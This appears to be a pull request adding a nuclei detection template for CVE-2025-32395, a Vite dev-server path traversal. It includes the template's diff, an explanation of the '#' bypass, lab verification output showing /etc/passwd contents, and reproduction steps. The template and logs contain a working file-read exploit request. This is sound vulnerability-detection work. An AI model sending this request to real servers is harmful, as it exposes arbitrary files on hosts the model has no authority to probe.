### PR TITLE
Add CVE-2025-32395 - Vite dev server arbitrary file read via hash character bypass

### DIFF
--- a/http/cves/2025/CVE-2025-32395.yaml
+++ b/http/cves/2025/CVE-2025-32395.yaml
@@ -1,15 +1,15 @@
 id: CVE-2025-32395
 
 info:
-  name: Vite Development Server - Arbitrary File Read via Hash Character Bypass
+  name: Vite - Path Traversal
   author: ChrisJr404
   severity: medium
   description: |
-    In Vite versions before 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the `server.fs.deny` allowlist can be bypassed by inserting a hash character (`#`) into the URL path. RFC 9112 disallows `#` in HTTP request-target fields, but Node.js and Bun do not reject such requests and pass them to user code. Vite's path validation does not account for the hash character, so `/@fs/<allowed>/#/../../../../etc/passwd` slips through `server.fs.deny` and the dev server returns the contents of arbitrary filesystem paths. This is a bypass for the patch of CVE-2025-30208.
+     Vite versions prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13 contain a file exposure vulnerability caused by improper handling of request URLs with '#' in the dev server running on Node or Bun, letting attackers access arbitrary files, exploit requires the server to be exposed to the network and running on Node or Bun.
   impact: |
     An unauthenticated attacker who can reach the Vite dev server (commonly exposed during development or in misconfigured deployments) can read arbitrary files on the host filesystem.
   remediation: |
-    Upgrade to Vite 6.2.6, 6.1.5, 6.0.15, 5.4.18, or 4.5.13 (or any later release in those branches). Never expose a Vite dev server directly to untrusted networks — it is intended for local development only.
+    Update to version 6.2.6, 6.1.5, 6.0.15, 5.4.18, or 4.5.13 or later.
   reference:
     - https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4
     - https://nvd.nist.gov/vuln/detail/CVE-2025-32395
@@ -23,11 +23,9 @@ info:
   metadata:
     verified: true
     max-request: 1
-    vendor: vite
-    product: vite
     shodan-query: http.html:"/@vite/client"
     fofa-query: body="/@vite/client"
-  tags: cve,cve2025,vite,lfi,traversal
+  tags: cve,cve2025,vite,lfi,vuln,unauth
 
 http:
   - raw:
@@ -36,16 +34,13 @@ http:
         Host: {{Hostname}}
 
     unsafe: true
-
     payloads:
       path:
         - "usr/src"
         - "app"
         - "src"
 
-    threads: 3
     stop-at-first-match: true
-
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2025/CVE-2025-32395.yaml
+++ b/http/cves/2025/CVE-2025-32395.yaml
@@ -1,0 +1,54 @@
+id: CVE-2025-32395
+
+info:
+  name: Vite Development Server - Arbitrary File Read via Hash Character Bypass
+  author: ChrisJr404
+  severity: medium
+  description: |
+    In Vite versions before 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the `server.fs.deny` allowlist can be bypassed by inserting a hash character (`#`) into the URL path. RFC 9112 disallows `#` in HTTP request-target fields, but Node.js and Bun do not reject such requests and pass them to user code. Vite's path validation does not account for the hash character, so `/@fs/<allowed>/#/../../../../etc/passwd` slips through `server.fs.deny` and the dev server returns the contents of arbitrary filesystem paths. This is a bypass for the patch of CVE-2025-30208.
+  impact: |
+    An unauthenticated attacker who can reach the Vite dev server (commonly exposed during development or in misconfigured deployments) can read arbitrary files on the host filesystem.
+  remediation: |
+    Upgrade to Vite 6.2.6, 6.1.5, 6.0.15, 5.4.18, or 4.5.13 (or any later release in those branches). Never expose a Vite dev server directly to untrusted networks — it is intended for local development only.
+  reference:
+    - https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-32395
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
+    cvss-score: 6.0
+    cve-id: CVE-2025-32395
+    cwe-id: CWE-200
+    epss-score: 0.00168
+    epss-percentile: 0.37572
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: vite
+    product: vite
+    shodan-query: http.html:"/@vite/client"
+    fofa-query: body="/@vite/client"
+  tags: cve,cve2025,vite,lfi,traversal
+
+http:
+  - raw:
+      - |+
+        GET /@fs/{{path}}/#/../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    payloads:
+      path:
+        - "usr/src"
+        - "app"
+        - "src"
+
+    threads: 3
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'regex("root:.*:0:0:", body)'
+        condition: and


### PR DESCRIPTION
### Summary
Adds a verified template for **CVE-2025-32395** — Vite versions before 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13 allow `server.fs.deny` to be bypassed by inserting a literal `#` into the URL path.

RFC 9112 forbids `#` in HTTP request-targets, but Node.js and Bun do not reject such requests and pass them to user code. Vite's path validation does not account for the hash character, so `/@fs/<allowed>/#/../../../../etc/passwd` slips through `server.fs.deny` and the dev server returns the contents of arbitrary filesystem paths. This is a bypass for the patch of CVE-2025-30208.

References:
- https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4
- https://nvd.nist.gov/vuln/detail/CVE-2025-32395

### Detection logic
Send a single raw HTTP request whose request-target contains a literal `#` between an allowed prefix and the traversal sequence. `unsafe: true` is required so the `#` actually hits the wire — most HTTP clients (and nuclei's normal client) drop everything from `#` onward as the URL fragment.

The template tries three common dev-server roots as `path` payloads — `usr/src` (default Node container working directory, used by Vulhub), `app` (containerized monorepo convention), and `src` — with `stop-at-first-match: true` so a real Vite host gets exactly one finding.

Match requires both `status_code == 200` and `regex(\"root:.*:0:0:\", body)`. The regex is the dispositive signal: an unrelated 200 response cannot contain `/etc/passwd` content.

### Verification
Tested on a clean Kali host using the published vulhub image.

**Vulnerable target — match:**

`vulhub/vite:6.2.5` — `docker compose up -d` from `vulhub/vite/CVE-2025-32395/`:
```
[CVE-2025-32395] Dumped HTTP request for http://127.0.0.1:5173/@fs/usr/src/#/../../../../../../etc/passwd
GET /@fs/usr/src/#/../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:5173

[CVE-2025-32395] Dumped HTTP response
HTTP/1.1 200 OK
Last-Modified: Tue, 07 Apr 2026 02:01:48 GMT
Vary: Origin

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
node:x:1000:1000::/home/node:/bin/bash

[CVE-2025-32395:dsl-1] [http] [medium] http://127.0.0.1:5173/@fs/usr/src/#/../../../../../../etc/passwd [path=\"usr/src\"]
[INF] Scan completed in 7.5ms. 1 matches found.
```

The other two payloads (`app`, `src`) returned the Vite index page (200 with HTML) — those don't match the `root:` regex, so no false positive even when the path doesn't traverse out of an allowed directory.

**Negative tests:**
- The regex `root:.*:0:0:` requires `/etc/passwd` content, so any other 200 response (Vite homepage, generic web app) will not match.
- A patched Vite (6.2.6+) returns 403 on the same request, so `status_code == 200` fails.

### Reproduction
```bash
git clone https://github.com/vulhub/vulhub.git
cd vulhub/vite/CVE-2025-32395
docker compose up -d
nuclei -t http/cves/2025/CVE-2025-32395.yaml -u http://localhost:5173
```

### Notes
- `unsafe: true` is mandatory. Without it, every standard HTTP client (including nuclei's default client) collapses the URL on `#` and the exploit silently fails.
- Vite dev servers should never be exposed to untrusted networks, but this CVE matters because reverse proxies, CI artifacts, and accidentally-public dev environments do happen — and the bypass is trivial to weaponize once a Vite dev server is reachable.

### Template Type / Checklist
- [x] CVE template (http/cves/2025/)
- [x] Verified (`metadata.verified: true`)
- [x] Strong matcher (status + regex of /etc/passwd content)
- [x] Validated with `nuclei -validate`
- [x] No real-world targets referenced